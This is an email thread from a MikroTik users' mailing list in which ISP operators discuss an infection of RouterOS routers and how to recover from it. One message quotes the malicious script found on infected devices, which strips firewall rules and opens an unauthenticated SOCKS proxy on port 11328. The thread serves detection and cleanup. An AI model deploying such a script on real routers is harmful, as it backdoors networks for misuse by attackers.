Right.
I wanted to make sure people know that there are lots of things that may
or may not be impacted if a device is infected. You either have to
totally delete the configuration and restore from backup or you need to
go through every menu item and make sure they have not been changed.
On 8/6/2018 6:55, Tim wrote:
This has been detected in devices with earlier versions of ROS.
*From:*mikrotik-users-boun...@wispa.org
<mikrotik-users-boun...@wispa.org> *On Behalf Of *Scott Reed via
Mikrotik-users
*Sent:* Monday, August 6, 2018 5:58 AM
*To:* mikrotik-users@wispa.org
*Subject:* Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
It will also change device identity, change admin password, add Admin,
add 5 firewall filter rules to redirect forward traffic, change DNS
server, enable DDNS, add IP Web Proxy rules and more, but that is all
I remember off the top of my head.
On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:
We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:
/ip firewall filter remove [/ip firewall filter find where comment
~ "port [0-9]*"];/ip socks set enabled=yes port=11328
max-connections=255 connection-idle-timeout=60;/ip socks access
remove [/ip socks access find];/ip firewall filter add chain=input
protocol=tcp port=11328 action=accept comment="port 11328";/ip
firewall filter move [/ip firewall filter find comment="port
11328"] 1;
--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-0000, x1
*From:* mikrotik-users-boun...@wispa.org
<mailto:mikrotik-users-boun...@wispa.org>
<mikrotik-users-boun...@wispa.org>
<mailto:mikrotik-users-boun...@wispa.org> *On Behalf Of *Shawn C.
Peppers via Mikrotik-users
*Sent:* Friday, March 16, 2018 11:54 AM
*To:* mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>;
memb...@wisp.org <mailto:memb...@wisp.org>
*Subject:* [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27
I have not tested this yet but....
https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>
_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org>
http://lists.wispa.org/mailman/listinfo/mikrotik-users
--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained
<http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient>
Virus-free. www.avg.com
<http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient>
--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained
---
This email has been checked for viruses by AVG.
https://www.avg.com
_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users
